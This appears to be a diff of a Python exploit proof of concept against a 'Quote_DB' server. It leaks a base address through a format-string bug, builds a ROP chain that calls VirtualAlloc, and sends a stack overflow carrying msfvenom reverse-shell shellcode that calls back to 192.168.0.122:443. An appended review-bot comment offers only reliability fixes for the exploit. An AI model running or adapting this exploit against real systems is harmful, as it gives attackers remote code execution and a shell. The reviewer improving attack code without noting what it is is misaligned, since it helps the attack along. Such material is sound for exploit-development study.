| 1 | + | #!/usr/bin/python3 |
| 2 | + | |
| 3 | + | # Quote_DB PoC |
| 4 | + | # William Moody, 07.06.2021 |
| 5 | + | |
| 6 | + | from functools import update_wrapper |
| 7 | + | import socket |
| 8 | + | import sys |
| 9 | + | from struct import pack, unpack |
| 10 | + | |
| 11 | + | if len(sys.argv) != 2: |
| 12 | + | print("Usage: %s server" % sys.argv[0]) |
| 13 | + | sys.exit(1) |
| 14 | + | |
| 15 | + | server = sys.argv[1] |
| 16 | + | port = 3700 |
| 17 | + | |
| 18 | + | # === |
| 19 | + | |
| 20 | + | def send(opcode, data): |
| 21 | + | buf = pack("<I", opcode) |
| 22 | + | buf += data |
| 23 | + | |
| 24 | + | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 25 | + | s.connect((server, port)) |
| 26 | + | s.send(buf) |
| 27 | + | |
| 28 | + | try: |
| 29 | + | ret = s.recv(16384) |
| 30 | + | s.close() |
| 31 | + | |
| 32 | + | return ret |
| 33 | + | except: |
| 34 | + | return None |
| 35 | + | |
| 36 | + | # === |
| 37 | + | |
| 38 | + | def get_quote(index): |
| 39 | + | return send(901, pack("<I", index)) |
| 40 | + | |
| 41 | + | def add_quote(quote): |
| 42 | + | return send(902, quote) |
| 43 | + | |
| 44 | + | def bad_request(buf): |
| 45 | + | return send(800, buf) |
| 46 | + | |
| 47 | + | # === |
| 48 | + | |
| 49 | + | print("[+] Getting base address...") |
| 50 | + | |
| 51 | + | quote_id = unpack("<I", add_quote(b"%x " * 30))[0] |
| 52 | + | base_str = get_quote(quote_id).split(b" ")[8].decode() |
| 53 | + | base = (int(base_str, 16) // 0x10000) * 0x10000 |
| 54 | + | |
| 55 | + | print(" -- " + hex(base)) |
| 56 | + | |
| 57 | + | # === |
| 58 | + | |
| 59 | + | size = 5000 |
| 60 | + | ropSize = 500 |
| 61 | + | |
| 62 | + | # === |
| 63 | + | |
| 64 | + | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.122 LPORT=443 EXITFUNC=thread -f python -v shell |
| 65 | + | shell = b"\x90" * 20 |
| 66 | + | shell += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64" |
| 67 | + | shell += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" |
| 68 | + | shell += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c" |
| 69 | + | shell += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52" |
| 70 | + | shell += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" |
| 71 | + | shell += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49" |
| 72 | + | shell += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" |
| 73 | + | shell += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75" |
| 74 | + | shell += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b" |
| 75 | + | shell += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" |
| 76 | + | shell += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a" |
| 77 | + | shell += b"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77" |
| 78 | + | shell += b"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" |
| 79 | + | shell += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" |
| 80 | + | shell += b"\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" |
| 81 | + | shell += b"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8" |
| 82 | + | shell += b"\x00\x7a\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56" |
| 83 | + | shell += b"\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c" |
| 84 | + | shell += b"\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5" |
| 85 | + | shell += b"\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6" |
| 86 | + | shell += b"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01" |
| 87 | + | shell += b"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56" |
| 88 | + | shell += b"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" |
| 89 | + | shell += b"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08" |
| 90 | + | shell += b"\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6" |
| 91 | + | shell += b"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" |
| 92 | + | shell += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" |
| 93 | + | |
| 94 | + | # === |
| 95 | + | |
| 96 | + | rop = [ |
| 97 | + | # 1. Get ESP (in eax) |
| 98 | + | base + 0x2610, # xor eax, eax ; ret |
| 99 | + | base + 0x1eb1, # or eax, esp ; ret |
| 100 | + | |
| 101 | + | # 2. Get dummy call addr (in ebx) |
| 102 | + | base + 0x2b88, # pop ecx ; ret |
| 103 | + | 0x1ec, # eax + ? = dummy call |
| 104 | + | base + 0x9b86, # add eax, ecx ; pop ebx ; ret |
| 105 | + | 0xffffffff, # junk for pop ebx |
| 106 | + | base + 0x1ebb, # mov ebx, eax ; ret |
| 107 | + | |
| 108 | + | # 3. Deref virtualAlloc (in eax) |
| 109 | + | base + 0x2b87, # pop eax ; pop ecx ; ret |
| 110 | + | base + 0x4321c, # base + iat + virtualalloc |
| 111 | + | 0xffffffff, # junk for pop ecx |
| 112 | + | base + 0x1eb4, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret |
| 113 | + | 0xffffffff, # junk for pop edx |
| 114 | + | |
| 115 | + | # 4. Write virtual alloc to dummy |
| 116 | + | base + 0x1ec2, # mov [ebx], eax ; ret |
| 117 | + | |
| 118 | + | # 5. Get shellcode addr (in eax) |
| 119 | + | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 120 | + | base + 0x2d3c, # mov eax, edx ; ret |
| 121 | + | base + 0x2b88, # pop ecx ; ret |
| 122 | + | 0x18, # eax + ? = dummy call |
| 123 | + | base + 0x9b86, # add eax, ecx ; pop ebx ; ret |
| 124 | + | 0xffffffff, # junk for pop ebx |
| 125 | + | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 126 | + | |
| 127 | + | # 6. Get dummy call addr + 0x4 (in ebx) |
| 128 | + | base + 0x1eca, # add ebx, 0x4 ; ret |
| 129 | + | |
| 130 | + | # 7. Write shellcode addr to dummy + 0x4 |
| 131 | + | base + 0x1ec2, # mov [ebx], eax ; ret |
| 132 | + | |
| 133 | + | # 8. Get dummy call addr + 0x8 (in ebx) |
| 134 | + | base + 0x1eca, # add ebx, 0x8 ; ret |
| 135 | + | |
| 136 | + | # 9. Write shellcode addr to dummy + 0x8 |
| 137 | + | base + 0x1ec2, # mov [ebx], eax ; ret |
| 138 | + | |
| 139 | + | # 10. Align esp with dummy call (ebx-8) |
| 140 | + | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 141 | + | base + 0x2b88, # pop ecx ; ret |
| 142 | + | 0xfffffff8, # edx + ? = dummy call |
| 143 | + | base + 0x1ece, # add edx, ecx ; ret |
| 144 | + | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 145 | + | base + 0x1ebe, # xchg ebx, esp ; dec ecx ; ret |
| 146 | + | ] |
| 147 | + | rop = b"".join([pack("<I", r) for r in rop]) |
| 148 | + | |
| 149 | + | # === |
| 150 | + | |
| 151 | + | dummy = b"aaaa" # VirtualAlloc |
| 152 | + | dummy += b"bbbb" # return <- shellcode addr |
| 153 | + | dummy += b"cccc" # lpAddress <- shellcode addr |
| 154 | + | dummy += pack("<I", 0x1) # dwSize <- 0x1 |
| 155 | + | dummy += pack("<I", 0x1000) # flAllocationType <- 0x1000 |
| 156 | + | dummy += pack("<I", 0x40) # flProtect <- 0x40 |
| 157 | + | |
| 158 | + | # === |
| 159 | + | |
| 160 | + | buf = b"A" * 2060 |
| 161 | + | buf += rop |
| 162 | + | buf += b"B" * (ropSize - len(rop)) |
| 163 | + | buf += dummy |
| 164 | + | buf += shell |
| 165 | + | |
| 166 | + | # === |
| 167 | + | |
| 168 | + | print("[+] Triggering overflow...") |
| 169 | + | |
| 170 | + | bad_request(buf) |
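Review bot: The bare `except:` at file line 33 in `send` turns every failure, including KeyboardInterrupt, into a `None` return, and on the `recv` failure path the socket opened at line 24 is never closed; the callers at lines 51–52 then fail with a TypeError inside `unpack`/`.split` instead of a readable error. Opening the socket with `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` makes the close unconditional on every path, and narrowing the handler to `except OSError:` keeps interrupts and programming errors visible. `recv` at line 29 also runs without a timeout, so an unresponsive peer hangs the script indefinitely; a `s.settimeout(...)` before the call would bound that, though the appropriate value is not evident from the page. The import `from functools import update_wrapper` at line 6 is unused and can be dropped. This note is anchored at the last visible line; the script may continue beyond it.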